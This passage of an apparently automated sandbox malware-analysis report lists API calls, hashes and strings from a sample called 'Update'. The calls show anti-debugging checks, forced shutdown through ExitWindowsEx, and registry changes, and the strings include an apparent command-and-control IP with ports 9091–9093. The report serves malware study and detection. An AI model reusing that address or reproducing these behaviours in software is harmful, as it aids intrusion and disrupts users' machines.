                                                                                                • UnhandledExceptionFilter.KERNEL32(038125B8), ref: 0380133C
                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 03801358
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 0380135F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 2579439406-0
                                                                                                • Opcode ID: df865d703748eb73ddcc5de86b54f03e16d3359d7c721df42f816d0d1a19c323
                                                                                                • Instruction ID: f31ef195cf4d8413bc161a95efd183dc2ee4c34d00f637a9d6d838f418c54a18
                                                                                                • Opcode Fuzzy Hash: df865d703748eb73ddcc5de86b54f03e16d3359d7c721df42f816d0d1a19c323
                                                                                                • Instruction Fuzzy Hash: A821E3B9544A24DFC790FF68F544649BBACFB08310F1006DAEA08C7389EB745580DF95
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 1000793D
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10007952
                                                                                                • UnhandledExceptionFilter.KERNEL32(10015350), ref: 1000795D
                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 10007979
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 10007980
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 2579439406-0
                                                                                                • Opcode ID: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
                                                                                                • Instruction ID: 193b6f3057f50b32987db54b87c2b31a729b11eea6cfb014211f1eca9ce5fffe
                                                                                                • Opcode Fuzzy Hash: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
                                                                                                • Instruction Fuzzy Hash: 7221AFB4818264EFF702DF68CDC96597BE5FB0A355F509019E5088B261EB75D5C0CF81
                                                                                                APIs
                                                                                                • CryptStringToBinaryA.CRYPT32(6CA86EEE,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6CA86570
                                                                                                • CryptStringToBinaryA.CRYPT32(C708C483,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6CA8660E
                                                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 6CA8666D
                                                                                                Strings
                                                                                                • Failed to calculate base64 decoded size., xrefs: 6CA86630
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: BinaryCryptString$___std_exception_copy
                                                                                                • String ID: Failed to calculate base64 decoded size.
                                                                                                • API String ID: 2515837927-3365390155
                                                                                                • Opcode ID: f43c02b47a32919092e55837df0c59286d6c1e1b0caaa97f4e021d56e5d4cb96
                                                                                                • Instruction ID: 8369f4091cebfc8669315e0c968e8a8740a608b0421c58f02c377a9a9d0f1a29
                                                                                                • Opcode Fuzzy Hash: f43c02b47a32919092e55837df0c59286d6c1e1b0caaa97f4e021d56e5d4cb96
                                                                                                • Instruction Fuzzy Hash: AA418EB1E12308AFEB14CF94CD45BDEBBB8FB04714F144529E905ABB80D774A588CBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 73040311bb29c5914551622f8c1703dce3cbee9cddaee4a5e747c8be854a9458
                                                                                                • Instruction ID: b87b1c764d92e44443031afec7c04a079ce0d45c243a2dd07328c67c4a4eb49b
                                                                                                • Opcode Fuzzy Hash: 73040311bb29c5914551622f8c1703dce3cbee9cddaee4a5e747c8be854a9458
                                                                                                • Instruction Fuzzy Hash: 62025C71E016199FDB14CFA9C88069EBBF1FF48318F28826AD515EB740D730A986CB94
                                                                                                APIs
                                                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6CAAF978
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFindFirst
                                                                                                • String ID:
                                                                                                • API String ID: 1974802433-0
                                                                                                • Opcode ID: 6c5800d434e9ab18f7952012b10f1ef83db28296d5cdac02962f68965a54fc41
                                                                                                • Instruction ID: 976246d68dbd42b3c66b21baac17b234a16d846177bfd5eef1cbf6867d2fa4cc
                                                                                                • Opcode Fuzzy Hash: 6c5800d434e9ab18f7952012b10f1ef83db28296d5cdac02962f68965a54fc41
                                                                                                • Instruction Fuzzy Hash: B971E67190615D6FDF199FA8CC88AEABBB9AF05308F1841DEE05997610DB314ECA8F14
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 6CA9C866
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6CA9C932
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CA9C94B
                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6CA9C955
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 254469556-0
                                                                                                • Opcode ID: d61e908850b870dcf0218780f12bcb1d27bafaa9752df206545a06fc7b7856fe
                                                                                                • Instruction ID: f547385ae3cb58b1697d572501f0d35cebd772dbf76c8e4a53908ab6f0a456a2
                                                                                                • Opcode Fuzzy Hash: d61e908850b870dcf0218780f12bcb1d27bafaa9752df206545a06fc7b7856fe
                                                                                                • Instruction Fuzzy Hash: 2D31E575D113199BDF20EFA4C9897CDBBF8AF08304F1041EAE40DAB250EB719A858F45
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6CAA3BA7
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6CAA3BB1
                                                                                                • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 6CAA3BBE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: 79e67d5dbad2f81970bf985df33910805b8258d122f5475f4b4e06890ca3226b
                                                                                                • Instruction ID: 0a974f97d31f9be6146345ce6a623f6ecccfd9ed9c8ea67c30180bfd23b1a0b5
                                                                                                • Opcode Fuzzy Hash: 79e67d5dbad2f81970bf985df33910805b8258d122f5475f4b4e06890ca3226b
                                                                                                • Instruction Fuzzy Hash: C031D37491122D9BCB21DF68D989BCCBBF8BF08314F5041EAE41CA7650EB709B858F44
                                                                                                APIs
                                                                                                  • Part of subcall function 037F7B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 037F7B89
                                                                                                  • Part of subcall function 037F7B70: OpenProcessToken.ADVAPI32(00000000), ref: 037F7B90
                                                                                                  • Part of subcall function 037F7B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 037F7BB6
                                                                                                  • Part of subcall function 037F7B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 037F7BCC
                                                                                                  • Part of subcall function 037F7B70: GetLastError.KERNEL32 ref: 037F7BD2
                                                                                                  • Part of subcall function 037F7B70: CloseHandle.KERNEL32(?), ref: 037F7BE0
                                                                                                • ExitWindowsEx.USER32(00000005,00000000), ref: 037FB471
                                                                                                  • Part of subcall function 037F7B70: CloseHandle.KERNEL32(?), ref: 037F7BFB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                • String ID:
                                                                                                • API String ID: 681424410-0
                                                                                                • Opcode ID: fdc56b34c163e72860b89c61ec94bdafa03c2fdd61e6d75f2dc88e527cb8f201
                                                                                                • Instruction ID: dd75357d3f6a6f811009f2d51f0844fd0faa6bc4258fd2484b54ea9506aa70bb
                                                                                                • Opcode Fuzzy Hash: fdc56b34c163e72860b89c61ec94bdafa03c2fdd61e6d75f2dc88e527cb8f201
                                                                                                • Instruction Fuzzy Hash: 9AC08C363402400AD218B2B8782AB6AB344EB85362F00046BA70ACC1C04C5284920AA6
                                                                                                APIs
                                                                                                  • Part of subcall function 037F7B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 037F7B89
                                                                                                  • Part of subcall function 037F7B70: OpenProcessToken.ADVAPI32(00000000), ref: 037F7B90
                                                                                                  • Part of subcall function 037F7B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 037F7BB6
                                                                                                  • Part of subcall function 037F7B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 037F7BCC
                                                                                                  • Part of subcall function 037F7B70: GetLastError.KERNEL32 ref: 037F7BD2
                                                                                                  • Part of subcall function 037F7B70: CloseHandle.KERNEL32(?), ref: 037F7BE0
                                                                                                • ExitWindowsEx.USER32(00000006,00000000), ref: 037FB44D
                                                                                                  • Part of subcall function 037F7B70: CloseHandle.KERNEL32(?), ref: 037F7BFB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                • String ID:
                                                                                                • API String ID: 681424410-0
                                                                                                • Opcode ID: d83c60af634967df5e6b09aa74bfa92ca929f0f9f7eaa1590320d05b6b35e33d
                                                                                                • Instruction ID: 7f855f6fc2d21135c68f0b4f71bdc0999029bb44493c824c80f9ee632b6080e0
                                                                                                • Opcode Fuzzy Hash: d83c60af634967df5e6b09aa74bfa92ca929f0f9f7eaa1590320d05b6b35e33d
                                                                                                • Instruction Fuzzy Hash: 51C08C363402000AD218B2B8782AB6AB340EB85362F00046BA70ACC1C04C5384A246A6
                                                                                                APIs
                                                                                                  • Part of subcall function 037F7B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 037F7B89
                                                                                                  • Part of subcall function 037F7B70: OpenProcessToken.ADVAPI32(00000000), ref: 037F7B90
                                                                                                  • Part of subcall function 037F7B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 037F7BB6
                                                                                                  • Part of subcall function 037F7B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 037F7BCC
                                                                                                  • Part of subcall function 037F7B70: GetLastError.KERNEL32 ref: 037F7BD2
                                                                                                  • Part of subcall function 037F7B70: CloseHandle.KERNEL32(?), ref: 037F7BE0
                                                                                                • ExitWindowsEx.USER32(00000004,00000000), ref: 037FB429
                                                                                                  • Part of subcall function 037F7B70: CloseHandle.KERNEL32(?), ref: 037F7BFB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                • String ID:
                                                                                                • API String ID: 681424410-0
                                                                                                • Opcode ID: 79c3aad3575d0ab314f0491ca01f6a9267029e3a601f669ff1a3979f68e04346
                                                                                                • Instruction ID: 2436a06b762061dbd9aced483324522a954905bdd136e8cf10df01ec6689aaac
                                                                                                • Opcode Fuzzy Hash: 79c3aad3575d0ab314f0491ca01f6a9267029e3a601f669ff1a3979f68e04346
                                                                                                • Instruction Fuzzy Hash: 5CC08C363402000AD218B3B8782AB69B340EB85362F00046BA70ACC1C04C62849206AA
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00001770,006E10D3), ref: 006E1769
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e0000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: 8621fed2281935648df01e4e72106bc649e86534026f44bf9239f3f11845602a
                                                                                                • Instruction ID: 0751186066844e4ec0dd84f6e8e942af3bc9f74c48932859235973be477a1fe8
                                                                                                • Opcode Fuzzy Hash: 8621fed2281935648df01e4e72106bc649e86534026f44bf9239f3f11845602a
                                                                                                • Instruction Fuzzy Hash:
                                                                                                APIs
                                                                                                  • Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721
                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 037FB586
                                                                                                • RegDeleteValueW.ADVAPI32(?,IpDate), ref: 037FB596
                                                                                                • RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 037FB5B3
                                                                                                • _memset.LIBCMT ref: 037FB5D4
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 037FB61B
                                                                                                • _memset.LIBCMT ref: 037FB63C
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 037FB72C
                                                                                                • Sleep.KERNEL32(000007D0), ref: 037FB737
                                                                                                  • Part of subcall function 037FF707: std::exception::exception.LIBCMT ref: 037FF756
                                                                                                  • Part of subcall function 037FF707: std::exception::exception.LIBCMT ref: 037FF770
                                                                                                  • Part of subcall function 037FF707: __CxxThrowException@8.LIBCMT ref: 037FF781
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
                                                                                                • String ID: 137.220.229.61$137.220.229.61$137.220.229.61$9091$9092$9093$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                                                                                                • API String ID: 1186799303-3585975511
                                                                                                • Opcode ID: 9e6784962ca11a5524c59ead3b5bf7d7465e3a66cec7151b6dd40af004174620
                                                                                                • Instruction ID: 882c153c3719ced761d1b2295ee9cb1c42b4e096a59b52dd384cec5271381155
                                                                                                • Opcode Fuzzy Hash: 9e6784962ca11a5524c59ead3b5bf7d7465e3a66cec7151b6dd40af004174620
                                                                                                • Instruction Fuzzy Hash: B54196757803007FE610E794EC4AF5E735CAF85B10F144194FB15BE382DAE8B52586AB
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 0380401C
                                                                                                • __mtterm.LIBCMT ref: 03804028
                                                                                                  • Part of subcall function 03803CF1: DecodePointer.KERNEL32(0000000A,03801084,0380106A,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03803D02
                                                                                                  • Part of subcall function 03803CF1: TlsFree.KERNEL32(00000021,03801084,0380106A,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03803D1C
                                                                                                  • Part of subcall function 03803CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03801084,0380106A,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03808D48
                                                                                                  • Part of subcall function 03803CF1: _free.LIBCMT ref: 03808D4B
                                                                                                  • Part of subcall function 03803CF1: DeleteCriticalSection.KERNEL32(00000021,?,?,03801084,0380106A,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03808D72
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0380403E
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0380404B
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03804058
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03804065
                                                                                                • TlsAlloc.KERNEL32(?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 038040B5
                                                                                                • TlsSetValue.KERNEL32(00000000,?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 038040D0
                                                                                                • __init_pointers.LIBCMT ref: 038040DA
                                                                                                • EncodePointer.KERNEL32(?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 038040EB
                                                                                                • EncodePointer.KERNEL32(?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 038040F8
                                                                                                • EncodePointer.KERNEL32(?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03804105
                                                                                                • EncodePointer.KERNEL32(?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03804112
                                                                                                • DecodePointer.KERNEL32(Function_00013E75,?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03804133
                                                                                                • __calloc_crt.LIBCMT ref: 03804148
                                                                                                • DecodePointer.KERNEL32(00000000,?,?,03800FC1,03816278,00000008,03801155,?,?,?,03816298,0000000C,03801210,?), ref: 03804162
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 03804174
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                • API String ID: 3698121176-3819984048
                                                                                                • Opcode ID: 8a827a49cca42d7ef8a199023e483387fec322698d93463c0e1f510e0db428d8
                                                                                                • Instruction ID: 48f0c553341a6feeece6894ac843b9bd5400088d65a401c2288946e4bd5b3f77
                                                                                                • Opcode Fuzzy Hash: 8a827a49cca42d7ef8a199023e483387fec322698d93463c0e1f510e0db428d8
                                                                                                • Instruction Fuzzy Hash: B63188F5940B14AFDBA0FFB6ED08519BFA9EB6436070446DAE920E3294E7748041EF40
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009ACE
                                                                                                • __mtterm.LIBCMT ref: 10009ADA
                                                                                                  • Part of subcall function 100097A5: DecodePointer.KERNEL32(00000009,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 100097B6
                                                                                                  • Part of subcall function 100097A5: TlsFree.KERNEL32(0000001F,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 100097D0
                                                                                                  • Part of subcall function 100097A5: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 1000C031
                                                                                                  • Part of subcall function 100097A5: _free.LIBCMT ref: 1000C034
                                                                                                  • Part of subcall function 100097A5: DeleteCriticalSection.KERNEL32(0000001F,?,?,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 1000C05B
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10009AF0
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10009AFD
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10009B0A
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10009B17
                                                                                                • TlsAlloc.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009B67
                                                                                                • TlsSetValue.KERNEL32(00000000,?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009B82
                                                                                                • __init_pointers.LIBCMT ref: 10009B8C
                                                                                                • EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009B9D
                                                                                                • EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BAA
                                                                                                • EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BB7
                                                                                                • EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BC4
                                                                                                • DecodePointer.KERNEL32(Function_00009929,?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BE5
                                                                                                • __calloc_crt.LIBCMT ref: 10009BFA
                                                                                                • DecodePointer.KERNEL32(00000000,?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009C14
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 10009C26
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                • API String ID: 3698121176-3819984048
                                                                                                • Opcode ID: f6145c8d2fc98865c4004398df4a04ed430af6cefd03571db8e2710a2f51a93a
                                                                                                • Instruction ID: 476fdbd6443a42851c863cb18b7173c2f7dcf4e8a02e7ba59ea7a710cfe5bbe7
                                                                                                • Opcode Fuzzy Hash: f6145c8d2fc98865c4004398df4a04ed430af6cefd03571db8e2710a2f51a93a
